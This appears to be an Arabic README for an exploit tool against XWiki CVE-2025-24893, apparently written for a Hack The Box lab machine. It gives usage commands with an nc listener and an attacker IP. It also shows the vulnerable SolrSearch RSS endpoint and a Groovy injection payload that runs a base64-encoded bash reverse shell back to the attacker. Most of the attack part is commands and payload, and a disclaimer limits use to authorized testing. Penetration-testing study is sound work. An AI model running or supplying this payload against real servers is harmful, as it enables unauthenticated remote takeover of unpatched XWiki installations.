
استغلال RCE غير مصادق عليه لـ XWiki CVE-2025-24893 عبر حقن سكريبت Groovy
أداة استغلال لتنفيذ التعليمات البرمجية عن بعد دون مصادقة لإصدارات XWiki المتأثرة بـ CVE-2025-24893.
إصدارات XWiki قبل 15.10.9 معرضة لثغرة تنفيذ أوامر عن بعد دون مصادقة عبر حقن سكربتات Groovy في معالج RSS الخاص بـ SolrSearch. توجد الثغرة لأن XWiki يفشل في تعقيم إدخال المستخدم بشكل صحيح في الوسيط text، مما يسمح للمهاجمين بالخروج من سياق RSS وحقن كود Groovy عشوائي.
معرف CVE: CVE-2025-24893
نقاط CVSS: 9.8 (حرجة)
الإصدارات المتأثرة: XWiki < 15.10.9
requests فقط)pip3 install requests
python3 exploit.py <target_url> <attacker_ip> <listener_port>
مثال:
# Start listener on attacker machine
nc -lvnp 9001
# Run exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001
}}}}}}{{{{groovy}}}})/xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>يستهدف الاستغلال النقطة التالية:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
تسمح الثغرة بالخروج من سياق تغذية RSS:
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}
هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر يسببه هذا البرنامج. استخدم هذا الاستغلال فقط ضد الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
رخصة MIT - انظر ملف LICENSE للتفاصيل
أُنشئ لصندوق HTB "Editor"
ملاحظة: تأكد دائمًا من الحصول على التصريح المناسب قبل اختبار أي أنظمة.